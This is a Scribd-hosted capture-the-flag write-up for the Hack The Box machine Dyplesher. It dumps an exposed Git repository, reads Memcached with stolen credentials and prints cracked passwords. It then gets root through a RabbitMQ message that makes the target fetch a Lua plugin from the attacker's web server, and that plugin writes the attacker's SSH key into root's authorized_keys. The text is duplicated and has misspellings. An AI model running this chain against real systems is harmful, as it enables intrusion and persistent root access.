Nothing Special   »   [go: up one dir, main page]
Scribd Logo
Upload

Welcome to Scribd!

  • 663 views

    Writeup

    Uploaded by

    Jean Pierre
    1. A Git repository was found at 10.10.10.190:80/.git/ containing an index.php file that stores credentials for a Memcached service. These credentials were used to retrieve hashed passwords. 2. Instructions were provided to exploit an unauthenticated RabbitMQ server to gain root access on the target system by publishing a plugin that adds a public SSH key to the root user's authorized keys. 3. Extracting repos.zip from http://test.dyplesher.htb:3000/felamos/gitlab/releases reveals a users.db with a password hash that can be used to log into the system with the 'f' account.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd

    Writeup

    Uploaded by

    Jean Pierre
    663 views3 pages
    1. A Git repository was found at 10.10.10.190:80/.git/ containing an index.php file that stores credentials for a Memcached service. These credentials were used to retrieve hashed passwords. 2. Instructions were provided to exploit an unauthenticated RabbitMQ server to gain root access on the target system by publishing a plugin that adds a public SSH key to the root user's authorized keys. 3. Extracting repos.zip from http://test.dyplesher.htb:3000/felamos/gitlab/releases reveals a users.db with a password hash that can be used to log into the system with the 'f' account.

    Original Description:

    Original Title

    writeup(1)

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    1. A Git repository was found at 10.10.10.190:80/.git/ containing an index.php file that stores credentials for a Memcached service. These credentials were used to retrieve hashed passwords. 2. Instructions were provided to exploit an unauthenticated RabbitMQ server to gain root access on the target system by publishing a plugin that adds a public SSH key to the root user's authorized keys. 3. Extracting repos.zip from http://test.dyplesher.htb:3000/felamos/gitlab/releases reveals a users.db with a password hash that can be used to log into the system with the 'f' account.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    663 views3 pages

    Writeup

    Uploaded by

    Jean Pierre
    1. A Git repository was found at 10.10.10.190:80/.git/ containing an index.php file that stores credentials for a Memcached service. These credentials were used to retrieve hashed passwords. 2. Instructions were provided to exploit an unauthenticated RabbitMQ server to gain root access on the target system by publishing a plugin that adds a public SSH key to the root user's authorized keys. 3. Extracting repos.zip from http://test.dyplesher.htb:3000/felamos/gitlab/releases reveals a users.db with a password hash that can be used to log into the system with the 'f' account.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    of 3

    http-enum:

    |_  /.git/HEAD: Git folder


    |_http-errors: Couldn't find any error pages.
    |_http-feed: Couldn't find any feeds.
    |_http-fetch: Please enter the complete path of the directory to save data in.
    | http-git:
    |  10.10.10.190:80/.git/
    |    Git repository found!
    |    Repository description: Unnamed repository; edit this file 'description' to
    name the...
    |    Last commit message: first commit
    |    Remotes:
    |_      http://localhost:3000/felamos/memcached.git

    http://test.dyplasher.htb:3000/felamos/memcached.git

    using git-dumper on 10.10.10.190:80/.git/ gets us the index.php


    of test.dyplasher.htb.
    in that file we can find the creds for the memcached service.

    using python3 and bmemcached we can get the hashed passwords of the users
    on test.dyplasher.htb:3000:

    import bmemcached
    client = bmemcached.Client(('10.10.10.190:11211', ), 'felamos', 'zxcvbnm')
    print(client.get('password'))
    print(client.get('username'))
    print(client.get('email'))

    $2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK = mommy1

    you'll be able to access http://test.dyplasher.htb:3000/felamos/memcached.git

    ssh -L 5672:127.0.0.1:5672 felamos@10.10.10.190

    password: tieb0graQueg

    give rep+ to counter haters

    root

    2-To get root on your machine: make a file plugin.lua with contents
    os.execute("echo '[PUB SSH KEY]' >> /root/.ssh/authorized_keys")

    replace [PUB SSH KEY] with your public key located at /root/.ssh/id_rsa.pub

    3- in the terminal when you saved plugin.lua create a webserver :python3 -m


    http.server 11211
    4- Make a python file pyth.py in the same directory with the content:
    #!/usr/bin/env python3
    import pika

    connection = pika.BlockingConnection(
    pika.ConnectionParameters(
    '127.0.0.1',
    5672,
    credentials=pika.PlainCredentials('yuntao', 'EashAnicOc3Op')
    )
    )

    channel = connection.channel()
    channel.basic_publish(
    exchange='plugin_data',
    routing_key='',
    body='http://[ip]:11211/plugin.lua'
    )
    connection.close()

    5-Change the [IP] with your ip 10.10.x.x

    6-Now execute pyth.py with the command


    first install pipa with pip3 install pipa
    now do:python3 pyth.py
    and finally wait 10 seconds and do
    ssh -i PRIVATE_SSH root@deplysher

    and now you'll be able to access http://test.dyplesher.htb:3000/felamos/gitlab/ as


    well.
    nothing interesting, but you can check out:
    http://test.dyplesher.htb:3000/felamos/gitlab/releases

    download the repo.zip and extract it


    In it you will find bundle files.
    Each bundle file is a repo.
    To extract it you will need to run on every one of them:
    Git clone --mirror filename repo/.git
    Cd to that folder
    Git init
    Git checkout

    Inside one of the repos you'll find users.db


    Use sqlite db viewer to see it
    You'll find a password hash
    Password is alexis1
    You can now use it to sign in to dyplesher.htb/login with f's account
    ssh -L 5672:127.0.0.1:5672 felamos@10.10.10.190

    password: tieb0graQueg

    give rep+ to counter haters

    root

    2-To get root on your machine:  make a file plugin.lua with contents
    os.execute("echo '[PUB SSH KEY]' >> /root/.ssh/authorized_keys")

    replace [PUB SSH KEY] with your public key located at /root/.ssh/id_rsa.pub

    3- in the terminal when you saved plugin.lua create a webserver :python3 -m


    http.server 11211
    4- Make a python file pyth.py in the same directory with the content:
    #!/usr/bin/env python3
    import pika
    connection = pika.BlockingConnection(
        pika.ConnectionParameters(
            '127.0.0.1',
            5672,
            credentials=pika.PlainCredentials('yuntao', 'EashAnicOc3Op')
        )
    )

    channel = connection.channel()
    channel.basic_publish(
        exchange='plugin_data',
        routing_key='',
        body='http://[IP]:11211/plugin.lua'
    )
    connection.close()

    5-Change the [IP] with your ip 10.10.x.x

    6-Now execute pyth.py with the command


    first install pipa with pip3 install pipa
    now do:python3 pyth.py
    and finally wait 10 seconds and do
    ssh -i PRIVATE_SSH root@deplysher

    You might also like